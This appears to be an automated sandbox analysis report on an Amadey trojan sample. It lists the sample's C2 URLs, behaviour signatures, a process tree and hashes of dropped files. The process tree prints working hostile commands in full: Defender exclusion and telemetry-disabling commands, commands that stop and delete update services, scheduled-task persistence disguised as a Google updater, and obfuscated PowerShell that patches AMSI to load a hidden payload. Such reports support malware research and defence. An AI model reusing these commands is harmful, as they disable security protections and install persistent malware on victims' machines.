Resubmissions
20-03-2023 09:26
230320-lekscscg39 10Analysis
-
max time kernel
50s -
max time network
105s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
-
submitted
20-03-2023 09:26
General
-
Target
99cb969e-5c61-4204-9902-f21da96b8e7a.exe
-
Size
113KB
-
MD5
86dc268e1263407b2a5a1a8f874d282a
-
SHA1
a4f0cef3711c85a65c43b27025bf373f10a84845
-
SHA256
974a488f846e09b83c1ce8224d649e229561e6f022d31ff01a6438ccb1e26f8b
-
SHA512
e792c226f23a04b692bb378ea3da6f5fbe6789e213e46c8316d6f684df7d5f28796f7e20300c8de853455d0a1bcce27ee0191ccc716195fef2717b20272845a6
-
SSDEEP
1536:Wurgu5SIr4FidRnablY5Rh+iqBUQMdzb:Wur9kuPnablIp6hi
Malware Config
Extracted
amadey
3.68
nestleservers.xyz/so57Nst/index.php
nestlehosts.xyz/so57Nst/index.php
nestlecareers.cf/so57Nst/index.php
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 6 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 52 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of WriteProcessMemory 42 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\99cb969e-5c61-4204-9902-f21da96b8e7a.exe"C:\Users\Admin\AppData\Local\Temp\99cb969e-5c61-4204-9902-f21da96b8e7a.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command Add-MpPreference -ExclusionPath 'C:\'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe"C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe"C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe"C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe"C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe"C:\Users\Admin\AppData\Local\Temp\WeatherApp.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1000151021\test.cmd" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command Add-MpPreference -ExclusionPath "C:"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command Add-MpPreference -ExclusionExtension exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command Set-MpPreference -MAPSReporting Disable5⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command Set-MpPreference -SubmitSamplesConsent NeverSend5⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command Add-MpPreference -ExclusionPath $env:UserProfile5⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command Add-MpPreference -ExclusionPath $env:ProgramFiles5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\1000157020\test.cmd" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command Add-MpPreference -ExclusionPath "C:"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command Add-MpPreference -ExclusionExtension exe5⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command Set-MpPreference -MAPSReporting Disable5⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command Set-MpPreference -SubmitSamplesConsent NeverSend5⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command Add-MpPreference -ExclusionPath $env:UserProfile5⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command Add-MpPreference -ExclusionPath $env:ProgramFiles5⤵
-
-
-
C:\Users\Admin\AppData\Roaming\1000158000\WinUIUpdate.exe"C:\Users\Admin\AppData\Roaming\1000158000\WinUIUpdate.exe"4⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force1⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f1⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc2⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc2⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop wuauserv2⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop bits2⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop dosvc2⤵
- Launches sc.exe
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f2⤵
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f2⤵
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f2⤵
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f2⤵
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 01⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 02⤵
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 02⤵
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 02⤵
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 02⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#srdzkpcvs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineUA' /tr '''C:\Program Files\Google\Chrome\chromeupdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\chromeupdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineUA' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineUA" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\chromeupdater.exe' }1⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:DyMvojvnkGwv{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NFsvjtRDpQkFHQ,[Parameter(Position=1)][Type]$WbNRgvvFuH)$ZLqbgLyAcVa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+'M'+'e'+''+[Char](109)+'or'+[Char](121)+'M'+[Char](111)+''+[Char](100)+'u'+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+'e'+''+[Char](108)+''+'e'+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'T'+'y'+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+','+''+'P'+''+[Char](117)+''+[Char](98)+'l'+'i'+''+[Char](99)+''+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+'A'+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+[Char](65)+'u'+'t'+''+'o'+''+'C'+'l'+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$ZLqbgLyAcVa.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'al'+[Char](78)+'a'+[Char](109)+''+[Char](101)+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+'g,'+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$NFsvjtRDpQkFHQ).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+''+'m'+'e,'+[Char](77)+'a'+[Char](110)+'a'+[Char](103)+'e'+'d'+'');$ZLqbgLyAcVa.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+'oke','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+'e'+[Char](119)+''+'S'+''+[Char](108)+''+'o'+'t'+','+''+'V'+''+[Char](105)+'r'+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$WbNRgvvFuH,$NFsvjtRDpQkFHQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+'e'+','+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $ZLqbgLyAcVa.CreateType();}$aUaUKhfajdiQW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+''+'t'+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+'i'+'c'+''+'r'+'o'+'s'+''+[Char](111)+''+[Char](102)+'t'+'.'+''+[Char](87)+''+[Char](105)+'n32'+[Char](46)+'U'+'n'+''+[Char](115)+''+[Char](97)+'f'+[Char](101)+'a'+[Char](85)+''+[Char](97)+''+'U'+''+[Char](75)+'h'+'f'+'a'+[Char](106)+'d'+[Char](105)+'Q'+[Char](87)+'');$enGpyQqaBkiBfK=$aUaUKhfajdiQW.GetMethod(''+[Char](101)+''+[Char](110)+''+[Char](71)+'p'+[Char](121)+''+[Char](81)+''+'q'+''+[Char](97)+''+'B'+''+[Char](107)+'i'+[Char](66)+'f'+'K'+'',[Reflection.BindingFlags]''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+'t'+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DBwGwzOfNKgflWmzOxw=DyMvojvnkGwv @([String])([IntPtr]);$axoqtsvoRRiJkOjeKnddud=DyMvojvnkGwv @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jTeAFIsKbmL=$aUaUKhfajdiQW.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](77)+'o'+'d'+''+'u'+'l'+[Char](101)+'H'+[Char](97)+'n'+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+'n'+'e'+'l'+''+[Char](51)+''+'2'+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'')));$TZSnMLXmfKQbKW=$enGpyQqaBkiBfK.Invoke($Null,@([Object]$jTeAFIsKbmL,[Object](''+[Char](76)+'o'+[Char](97)+'d'+[Char](76)+''+'i'+''+'b'+''+[Char](114)+'a'+'r'+'y'+'A'+'')));$zeuqlDfHmhefOylxI=$enGpyQqaBkiBfK.Invoke($Null,@([Object]$jTeAFIsKbmL,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+'a'+''+'l'+''+'P'+''+[Char](114)+'ot'+[Char](101)+'c'+[Char](116)+'')));$mVJgALL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TZSnMLXmfKQbKW,$DBwGwzOfNKgflWmzOxw).Invoke(''+'a'+''+'m'+'s'+'i'+'.'+[Char](100)+''+'l'+''+'l'+'');$OEdJsUeqnYmKuioSB=$enGpyQqaBkiBfK.Invoke($Null,@([Object]$mVJgALL,[Object]('A'+'m'+''+'s'+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+'B'+''+'u'+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$UdOTrepziU=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zeuqlDfHmhefOylxI,$axoqtsvoRRiJkOjeKnddud).Invoke($OEdJsUeqnYmKuioSB,[uint32]8,4,[ref]$UdOTrepziU);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$OEdJsUeqnYmKuioSB,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zeuqlDfHmhefOylxI,$axoqtsvoRRiJkOjeKnddud).Invoke($OEdJsUeqnYmKuioSB,[uint32]8,0x20,[ref]$UdOTrepziU);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+''+[Char](84)+''+'W'+''+[Char](65)+'RE').GetValue(''+'d'+'i'+'a'+''+'l'+''+[Char](101)+''+[Char](114)+''+'s'+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AiuuaDIIXeAN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$aTrNDIOHcTLycH,[Parameter(Position=1)][Type]$eyaDLOojvA)$tzBJkUHSshU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+'f'+''+[Char](108)+''+[Char](101)+'ct'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+'ga'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'e'+[Char](109)+'or'+[Char](121)+''+'M'+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+'l'+'eg'+'a'+'te'+[Char](84)+''+'y'+''+[Char](112)+''+'e'+'',''+[Char](67)+'la'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+'ubli'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+'u'+'t'+''+[Char](111)+'C'+'l'+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$tzBJkUHSshU.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+'N'+'a'+'m'+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+'i'+''+'g'+''+','+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$aTrNDIOHcTLycH).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+'ag'+'e'+''+[Char](100)+'');$tzBJkUHSshU.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+'l'+''+[Char](105)+''+'c'+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+','+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+'o'+'t'+[Char](44)+''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$eyaDLOojvA,$aTrNDIOHcTLycH).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+'m'+'e,Ma'+'n'+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $tzBJkUHSshU.CreateType();}$zCGfyCURtPZrg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+'t'+'e'+'m'+'.'+[Char](100)+''+'l'+''+'l'+'')}).GetType('M'+[Char](105)+'cr'+'o'+'s'+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+'U'+[Char](110)+''+'s'+''+'a'+''+[Char](102)+'ez'+'C'+''+'G'+''+[Char](102)+'y'+[Char](67)+''+'U'+''+[Char](82)+''+'t'+'P'+[Char](90)+''+[Char](114)+''+[Char](103)+'');$URFIYjEflZYrSe=$zCGfyCURtPZrg.GetMethod(''+'U'+''+'R'+''+[Char](70)+''+[Char](73)+''+'Y'+'j'+[Char](69)+''+'f'+''+'l'+''+[Char](90)+''+'Y'+''+'r'+''+'S'+''+'e'+'',[Reflection.BindingFlags]''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$QTBqfSiCGQsUswBykzE=AiuuaDIIXeAN @([String])([IntPtr]);$gdPxQmAiKzRFOUisgEJDTx=AiuuaDIIXeAN @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UTsbqgGIbUn=$zCGfyCURtPZrg.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+'d'+''+'u'+'l'+[Char](101)+''+'H'+''+'a'+'nd'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+'2'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$DjpcqsSeahDCvI=$URFIYjEflZYrSe.Invoke($Null,@([Object]$UTsbqgGIbUn,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+'L'+''+'i'+'b'+'r'+''+'a'+''+[Char](114)+''+[Char](121)+''+'A'+'')));$NzsdUYxAanJjBXmeQ=$URFIYjEflZYrSe.Invoke($Null,@([Object]$UTsbqgGIbUn,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+'r'+''+'o'+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$YmeFRhX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DjpcqsSeahDCvI,$QTBqfSiCGQsUswBykzE).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+'dl'+'l'+'');$hNIeSSgwPYuxVZatO=$URFIYjEflZYrSe.Invoke($Null,@([Object]$YmeFRhX,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+'a'+[Char](110)+'B'+[Char](117)+'f'+'f'+''+[Char](101)+'r')));$xKMLaFRkqs=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NzsdUYxAanJjBXmeQ,$gdPxQmAiKzRFOUisgEJDTx).Invoke($hNIeSSgwPYuxVZatO,[uint32]8,4,[ref]$xKMLaFRkqs);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hNIeSSgwPYuxVZatO,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NzsdUYxAanJjBXmeQ,$gdPxQmAiKzRFOUisgEJDTx).Invoke($hNIeSSgwPYuxVZatO,[uint32]8,0x20,[ref]$xKMLaFRkqs);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+'R'+'E').GetValue(''+[Char](100)+''+[Char](105)+'al'+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{48012321-eddf-4b85-bc2e-1e5a709e3778}1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD53746452a52ad7d0919544b9b3bba169c
SHA11c00fb5185399b4f5847678e1e88def064502b6f
SHA25627897da892c686239056be56b31ef13babb14db403886d6e2b84e800fb327a80
SHA5124bf852772e19584556a078909732eb73e97699ea1aa3d20bbe18c42f52319ed0ea6ae9326e811861cd178a054111d2042d862f2a2ebce8f8aa95aa728dca6405
-
Filesize
18KB
MD501da2da534effaed9e626e59df56ffa0
SHA1fcf7d6f01be189ed3e689034053636a6dac1da68
SHA2568f461f4e484f7da9acd2490fa7dd654349738fca725a512a9e37d030db972a99
SHA51297a086ba81642753fbd16ad2c8a783c56f0a9f47513093f27c1ebf2c6e1855fdd642b300bf7be4852958b660568289f2f66584b29245dca1b80de8162112bdcb
-
Filesize
18KB
MD51cc990f8d493539c6d997ff983e18380
SHA1b1eaa5a009741fc1bc1d404d48e2e24807407d1a
SHA2567d022751d4c597c2372e2738e48aaf7a3ff008f888160e996798cc5b63ba8122
SHA512280857957549ca9aa371c53f58db221d81b8d393244f7e13fcfd7a2eb5f96c1ae2c98eaf2aaddfa3761edcde629890755de54b7888fccc64a36de506ede94610
-
Filesize
18KB
MD520a76d44ad3b099ab47ecd14a118dba5
SHA1cb2dcd6395f859076f35add5c0c89735c3113697
SHA256ab65318aa9947b39bc55134719655bed7dc923a1652a43886d1f87ef25dd8219
SHA512ee6d632e142cffa4f0a61fdd125b62458093a20dbd83eee135e31ed833a313141bdbc39dac7cf934d6bdda200da76c84a18c96f38d69bd03a6137e917a221465
-
Filesize
18KB
MD5bd4563b69dbd21c5d9fc4da751e770f8
SHA1a12ba6517b38cab069f10842a60d4939878045da
SHA256701c7dc9e0570a57c7b3d1520cd43623521f2559f72c107cbf2cda5c221e621b
SHA512179e8a628ea6ffcd3aab94122cd535fef8abfcc48830086f60ab3caf96e536b1ece351cb26ac71a063c74e6acaba8ba8e4f8302811af3f960a05702895a11052
-
Filesize
18KB
MD520babb24a369089be430823ad2a78dcd
SHA180ff6ff6ef0b3396b5bc6d310caac1594d9f3dec
SHA25666f254a0d2e1299b5f7eb5413493eae31ab1e8b59c48770cea32ada30d3f0d32
SHA5127ed1709a722735d9c6862a6ec45271be4c8613b3f4cb9e419037bb51911b26765567b107f833ab6abe06695fb9193148ff8aa109b48a7ddd30c2d00a38d71e55
-
Filesize
18KB
MD5c910eaf7d75d6d011c01389c0fdb9aa6
SHA1004f0d99626778b34d4c537532c4c01ec6dc7086
SHA256a5fa2313541e16edaa585224ca6471f9dd04e9b44fab1ce86b161f49a9f02715
SHA512d2818914ac2153aaaa71db1f3534c87e72b9701ccb98554dbb09b0ce982e1ae17e2d6e61fdab994693f41a424494255c7c7ddc1757c7b40f8af41eb15b26c416
-
Filesize
18KB
MD566b767affbdacb187528cdd33c56b792
SHA132b149ec3b010cfe715ca23c0309628fc34c0c5b
SHA2560178e0893bd8720deafc612de2722ff215e325b1484a0ce87fcfde6dcb625127
SHA512c26f14b3f70c23314dddcd1884c4c09849516ef9ddd6e7269379c174a3af85527a0f78636f01be05fe9c81fad97b4ffa73c44ad2b64e91933f16cc7bba3e8629
-
Filesize
18KB
MD54cd2bb97856ca01a8fc6a4f0217dbadc
SHA1be6422a4c79ca0edf793ac977836ab54b18721d7
SHA25614ca288a7d5cb43c4fed8e11e5fa5e1b34c5d617717ae21af878b0fe139b89ed
SHA5126019ad3f4644bd2d79a9065fe6d86353094275085c5b693e3de436a3a7acf44107366b5af0c865386d567bbc94db1ea255ddf83354165cca1f6b08f86b3b2cdb
-
Filesize
18KB
MD5f4827942cd92fa0d56b8dd17b8329378
SHA1902ebc3cc6c924a92f638014efbbbcc52daa9a1b
SHA256e330727be64a8190324eb0821d9e6966885ca557117148c7361fe9acc8558be5
SHA512f695ac633130297cbfc6d34aa12a790dd2df41fb627eb81d8c01103a2ac859df0a744de00949099027a39911c000174def2039308baaaf92f5213bc4153f15d5
-
Filesize
18KB
MD5da94b700ec4c0d84cd1a33ccad7ada80
SHA19f4db6d151a22838961166331edded08551d61ba
SHA256735bbb14cc25c02bafb7b77e4d141637b8d5cba661e1dd6db10f94651ae8fa42
SHA5121339bf892b60c63bf7fd3d6d0dafc1f9bcb669eeba50e9b364c603b2aff734e3a0a02a03354391de450b809e3d75be5bd84b0c163e76717b57d50991536f523b
-
Filesize
136B
MD54c8be2b8cd46fc8957ae27121c0be186
SHA18a6cfe9458ab005b1fddd4ab906911f549e78795
SHA256a631985f149b52ac072126e1f25dbc81e3eae21d042fc5cb562fd68c1275d834
